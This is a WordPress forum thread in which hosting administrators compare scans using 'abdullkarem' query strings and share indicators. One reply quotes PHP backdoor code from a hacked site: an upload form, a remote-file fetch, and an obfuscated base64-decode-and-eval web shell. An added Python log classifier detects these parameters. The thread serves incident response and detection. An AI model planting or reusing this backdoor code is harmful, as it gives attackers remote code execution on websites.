• Hello and sorry if this is not the right forum for this question.
    I’m working for a webhosting company hosting a lot of WordPress sites for our customers.
    As of last Saturday our servers have been getting a lot of scanning traffic (other than the usual DDoS for xmlrpc and brute forces on wp-login.php) scanning for random files. The thing that stands out in these scans is the name Abdull Karem:

    GET /wp-includes/css/guide.php?php4&root&upl&wphp4&abdullkarem&
    GET /wp-includes/css/log.php?php4&root&upl&wphp4&abdullkarem&45
    GET /wp-includes/wp-class.php?php4&root&upl&wphp4&abdullkarem&4
    GET /wp-content/themes/guide.php?php4&root&upl&wphp4&abdullkare
    GET /wp-admin/log.php?php4&root&upl&wphp4&abdullkarem&450799&wp

    etc etc
    The scans are coming from dozens of different ip addresses, lots of them from cloud servers like Amazon.
    Sometimes I get more than 200pps for this scan alone per server.
    Has anybody experienced the same in their logs, and what are they looking for?

    Thanks for reading,

    Robert

Viewing 15 replies - 1 through 15 (of 32 total)
  • This may be an outdated WP exploit or someone using a broken script scanning for vulnerable login pages; as long as you have some sort of security precautions in place you shouldn’t worry.

    Very interesting to say the least however.

    Thread Starter EstofexNL

    (@estofexnl)

    Yes, I have never seen this one before.
    Normally it’s just the xmlrpc and wp-login.php.
    I checked the backlogs to see if there are any traces for abdullkarem but couldn’t find any.
    It seems to have started last Saturday.
    Google isn’t very helpful either at the moment (did you mean Abdul Karim?)

    I’ve tried googling the name too, not much is coming up apart from the famous basketball player.

    I don’t think they are gaining or hindering anything scanning for something like this.

    Got the exact same entries here in one of our logs. Just blocked the IP to get rid of’m.
    Interesting indeed!

    I’ve seen quite a bit of that too.

    I’m not a mod_rewrite guru but I’m guessing that it would be pretty easy to write something that redirects to 127.0.0.1 any request that contains that name…

    Same here. It came from IP 54.77.14.200 (ec2-54-77-14-200.eu-west-1.compute.amazonaws.com). Waste of CPU and disk space…

    Hackers utilizing Amazon AWS instances; sucks because Amazon offers great server instances as well.

    appleisleprospector

    (@appleisleprospector)

    Same here.

    /class-getid3.php?450699=1&php4=1&root=1&upl=1&wphp4=1&abdullkarem=1&wp=1&module=1&php=1&php5=1&wphp5=1

    950+ requests in the space of 30 minutes. It seems like all the instances contain the words ‘abdullkarem’ and ‘module’, and the number 450699.

    My traffic was coming from 91.231.0.120, located in Romania.

    I guess these hackers look after something like

    if(isset($_GET[php4])) {echo '<form action="" method="post" enctype="multipart/form-data" name="silence" id="silence">'; echo '<input type="file" name="file"><input name="golden" type="submit" id="golden" value="Done"></form>';
    if( $_POST['golden'] == "Done" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '+'; } else { echo '-'; }}} if(isset($_GET[php5])) {$file=$_GET["php5"]; $wpf=strrchr($file, '/'); $wpf=str_replace("/","",$wpf); $content=file_get_contents($file); $wpt = fopen($wpf, "w"); fwrite($wpt, $content); fclose($wpt); } else {echo '<title></title>';}

    in your files. At least that was written in a plugins/index.php file of one of our hacked customer sites. Along with a wp-cont.php file in the same directory with
    <script language='php'> $a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); eval($a($_REQUEST[sam]));

    and some other nasty things. What we think: with the help of these hacked files, “abdullkarem” uploaded some other files to the system, did what he wanted to do and deleted them again.

    So watch out for any “golden” POSTs and “sam” requests.
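As an added example (not code from this thread or from any of its posters): a small Python access-log classifier that flags the scan signature quoted earlier in the thread (the php4/wphp4/abdullkarem parameter set) and any request carrying the php4, php5 or sam parameters that the posted backdoor code reads, then counts hits per source IP so noisy sources can be blocked. The log lines, IPs and timestamps are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format, modelled on the
# requests quoted in this thread (IPs and timestamps are made up).
SAMPLE_LOG = """\
203.0.113.10 - - [13/Jan/2015:10:01:02 +0000] "GET /wp-includes/css/guide.php?php4&root&upl&wphp4&abdullkarem& HTTP/1.0" 404 1234 "-" "-"
203.0.113.10 - - [13/Jan/2015:10:01:03 +0000] "GET /wp-admin/css/css.php?450699=1&php4=1&root=1&upl=1&wphp4=1&abdullkarem=1&wp=1&module=1&php=1&php5=1&wphp5=1 HTTP/1.0" 404 24284 "-" "-"
198.51.100.7 - - [13/Jan/2015:10:02:10 +0000] "GET /wp-content/plugins/wp-cont.php?sam=aGVsbG8= HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [13/Jan/2015:10:02:11 +0000] "POST /wp-content/plugins/index.php?php4 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.55 - - [13/Jan/2015:10:03:00 +0000] "GET /index.php?p=42 HTTP/1.1" 200 8192 "http://example.com/" "Mozilla/5.0"
"""

# Minimal combined-log pattern: client IP, request method and target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameter names that appear together in every scan line quoted in the thread.
SCAN_MARKERS = {"abdullkarem", "php4", "wphp4"}
# Parameters the posted backdoor reads: php4/php5 select the upload and
# remote-fetch branches, sam carries the base64 payload handed to eval().
BACKDOOR_PARAMS = {"php4", "php5", "sam"}

def classify(line):
    """Return ("scan", ip), ("backdoor", ip) or None for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    # keep_blank_values keeps bare keys such as "php4&root&upl" (no "=1").
    params = set(parse_qs(query, keep_blank_values=True))
    if SCAN_MARKERS <= params:
        return ("scan", m.group("ip"))
    if params & BACKDOOR_PARAMS:
        return ("backdoor", m.group("ip"))
    return None

def summarize(log_text):
    """Count flagged requests per (kind, ip) to support blocking decisions."""
    counts = Counter()
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            counts[hit] += 1
    return counts

if __name__ == "__main__":
    for (kind, ip), n in summarize(SAMPLE_LOG).most_common():
        print(f"{kind:9} {ip:15} {n}")
```

Only the query string is visible in an access log, so a "golden" POST body is not caught here; that needs a request-body log or a file-integrity check on the plugins directory.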

    @WesterRora

    Interesting! Thanks for sharing.

    Thread Starter EstofexNL

    (@estofexnl)

    @WesterRora

    Thanks a lot!
    That is very helpful.

    I saw an event last week from 192.237.187.78 (US) with the same WP attempts with the wphp4&abdullkarem&wp& string. A basic query brought me to a file that was being requested from several other WP pages, /.abdullkarem/3.txt, which is likely the file that these requests are trying to inject or reach out to on every WP page. Sucuri identified it as a possible htaccess file or index.php attack resulting in redirects to malicious spam and malware domains, but not sure if it’s that serious, a FP, or simply allows the perp unauthorized read/write/delete permission.

    Dug around some more and came across a suspicious domain, mohmademad.com, which seems to be either infected with the /.abdullkarem/3.txt file or it is possibly a callout/C2 for the file. Sucuri identified it as a possible htaccess file attack, you can see the results through Sucuri’s SiteChecker, https://sitecheck.sucuri.net/results/muhmademad.com .
    Haven’t gone in that deep yet but just sending out an FYI to the community since it seems to be circulating.
    -AK

    Thanks for keeping everyone posted!

    Hi all,

    Just to be informative. Noticed this today on some sites for file: /wp-admin/css/css.php

    "GET /wp-admin/css/css.php?450699=1&php4=1&root=1&upl=1&wphp4=1&abdullkarem=1&wp=1&module=1&php=1&php5=1&wphp5=1 HTTP/1.0" 404 24284 "-" "-"

    IP originates from Africa (Owner address refers to Isle Mauritius).

    Regards,

    Gerard.

  • The topic ‘Whois Abdull Karem and why are they scanning?’ is closed to new replies.